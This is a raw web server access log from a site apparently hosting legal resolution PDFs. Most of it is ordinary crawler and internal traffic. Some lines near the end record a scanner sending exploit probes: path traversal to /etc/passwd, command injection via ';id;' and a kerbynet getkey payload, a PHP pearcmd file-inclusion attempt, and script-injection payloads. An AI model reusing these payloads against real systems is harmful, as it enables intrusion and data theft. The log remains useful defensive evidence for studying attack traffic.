201.245.192.253 - - [27/Feb/2024:05:02:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:05:02:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
201.245.192.253 - - [27/Feb/2024:05:03:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [27/Feb/2024:05:03:54 -0500] "GET /BLA/resoluciones/AUTOS%202023/0100.pdf HTTP/1.1" 200 445189
201.245.192.253 - - [27/Feb/2024:05:04:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [27/Feb/2024:05:04:24 -0500] "GET /BLA/resoluciones/AUTOS%202023/0209.pdf HTTP/1.1" 200 382383
172.22.2.4 - - [27/Feb/2024:05:04:35 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
172.22.2.4 - - [27/Feb/2024:05:04:36 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [27/Feb/2024:05:04:36 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [27/Feb/2024:05:04:37 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [27/Feb/2024:05:04:37 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
216.244.66.195 - - [27/Feb/2024:05:05:09 -0500] "GET /BLA/resoluciones/AUTOS%202023/1022.pdf HTTP/1.1" 200 391658
172.22.2.4 - - [27/Feb/2024:05:03:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:05:05:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [27/Feb/2024:05:06:01 -0500] "GET /BLA/resoluciones/AUTOS%202023/1668.pdf HTTP/1.1" 200 406174
201.245.192.253 - - [27/Feb/2024:05:06:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:05:04:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59083
216.245.221.92 - - [27/Feb/2024:05:06:12 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [27/Feb/2024:05:06:44 -0500] "GET /BLA/resoluciones/AUTOS%202023/1897.pdf HTTP/1.1" 200 477273
216.244.66.195 - - [27/Feb/2024:05:07:36 -0500] "GET /BLA/resoluciones/AUTOS%202023/4141.pdf HTTP/1.1" 200 427487
201.245.192.253 - - [27/Feb/2024:05:07:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:05:07:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
201.245.192.253 - - [27/Feb/2024:05:08:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:05:08:14 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
59.126.239.125 - - [27/Feb/2024:05:08:21 -0500] "POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1" 404 1035
59.126.239.125 - - [27/Feb/2024:05:08:43 -0500] "POST /mobile/plugin/browser.jsp HTTP/1.1" 404 1035
59.126.239.125 - - [27/Feb/2024:05:09:38 -0500] "GET /src/redirect.php?plugins[]=../../../../etc/passwd%00 HTTP/1.1" 404 1035
66.249.79.107 - - [27/Feb/2024:05:09:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0358.pdf HTTP/1.1" 200 91127
201.245.192.253 - - [27/Feb/2024:05:09:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
59.126.239.125 - - [27/Feb/2024:05:09:47 -0500] "GET /cgi-bin/masterCGI?ping=nomip&user=;id; HTTP/1.1" 404 1035
201.245.192.253 - - [27/Feb/2024:05:10:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
59.126.239.125 - - [27/Feb/2024:05:10:10 -0500] "GET /2cwbFSyAJuQQUd1lGbNKnTpMJGK.jsp HTTP/1.1" 404 1035
59.126.239.125 - - [27/Feb/2024:05:10:30 -0500] "\x16\x03\x01" 400 226
66.249.79.96 - - [27/Feb/2024:05:10:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/7425.pdf HTTP/1.1" 200 495513
59.126.239.125 - - [27/Feb/2024:05:10:38 -0500] "GET /admin/user.php HTTP/1.1" 404 1035
59.126.239.125 - - [27/Feb/2024:05:10:53 -0500] "GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+3SK7ADPhxi.log HTTP/1.1" 200 319
172.22.2.4 - - [27/Feb/2024:05:09:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [27/Feb/2024:05:11:12 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:05:11:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:05:10:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60730
201.245.192.253 - - [27/Feb/2024:05:12:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
59.126.239.125 - - [27/Feb/2024:05:12:13 -0500] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1" 404 1035
201.245.192.253 - - [27/Feb/2024:05:12:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
59.126.239.125 - - [27/Feb/2024:05:12:52 -0500] "GET /src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1035
59.126.239.125 - - [27/Feb/2024:05:13:06 -0500] "GET /src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search HTTP/1.1" 404 1035
